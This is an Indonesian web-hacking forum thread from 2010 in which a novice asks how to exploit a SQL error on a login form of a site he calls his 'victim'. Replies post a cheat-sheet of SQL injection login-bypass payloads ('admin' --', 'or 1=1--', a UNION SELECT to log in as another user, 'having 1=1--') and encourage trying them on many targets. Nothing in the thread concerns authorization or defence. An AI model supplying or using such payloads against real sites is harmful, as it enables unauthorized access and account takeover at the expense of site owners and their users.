Pesen Om PONI

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Pesen Om PONI

Post by RJ-45 » Sat Jun 26, 2010 11:02 pm

Karena disuruh om poni suruh nanyain diforum makanya saya tanyakan disin saja kakak2 yang baik hati tidak sombong dan rajin menabung......

numpang tanya kakak...
kalau pada form loginnya kita isikan ' pada username n password kosong kok muncul pesan error begini ya??

Code: Select all

Error !!!


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
itu memungkinkan buat di inject g kakak? lo bisa caranya gmana??
mohon maaf lo banyak tanya,

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: Pesen Om PONI

Post by poni » Mon Jun 28, 2010 8:19 pm

itu bug sqli. bisa di inject. tutor sqli kan banyak di forum..
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Pesen Om PONI

Post by RJ-45 » Mon Jun 28, 2010 11:30 pm

hehehe...
pi ku bingung mas lo nginjectnya lewat form....
maklum newbie banget.....
:maaf: :maaf: :maaf: :maaf: :maaf: :maaf: :maaf:

User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:

Re: Pesen Om PONI

Post by Darkzzzz » Sun Jul 04, 2010 9:45 am

Lah kan bang poni udah bikin tutor Havij & Sql Helper...
Dicoba aja...
I'm not A Hacker, But I'm A Image

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Pesen Om PONI

Post by RJ-45 » Tue Jul 06, 2010 2:42 am

Lo pake tool malah mebingunkan kakak, wong yang mau di inject tu form loginnya......

User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:

Re: Pesen Om PONI

Post by Darkzzzz » Tue Jul 06, 2010 9:40 pm

Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Referensi : http://www.securiteam.com/securityreviews/5DP0N1P76E.html
I'm not A Hacker, But I'm A Image

b0c4h
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: Pesen Om PONI

Post by b0c4h » Mon Jul 12, 2010 11:48 pm

Darkzzzz wrote:Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
Referensi : http://www.securiteam.com/securityrevie ... 1P76E.html
mw nambahin atu ya omz darkzzzz....
bs jg pk : 'having 1=1--

.thx.
Love And Peace cannot Created without "RESPECT"

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Pesen Om PONI

Post by RJ-45 » Wed Jul 14, 2010 1:41 pm

hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...

b0c4h
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: Pesen Om PONI

Post by b0c4h » Thu Jul 15, 2010 2:02 am

RJ-45 wrote:hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...
ahhh,,,ms sih kk....kmrn sy ga nympe 100 koq...tp msh da j web yg vuln pk teknik ky gtu....
kmrn sy yg pk 'having 1=1-- sm bypass login 'or 1=1-- ......
yg sabar j kk....jika saat'a tiba, pasti akan datang juga....(haalaaaahhhh....bahasa uoopoooo kuiii....kbanyakan nonton sinetron ki....wkwkwkkwkw...:D...)

.thx.
Love And Peace cannot Created without "RESPECT"

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Pesen Om PONI

Post by RJ-45 » Fri Jul 16, 2010 9:03 pm

heheh coz korbannya cuma satu....
lo 100 korban past ada yang bisa.. hehehehe

Post Reply

Return to “Web Hacking”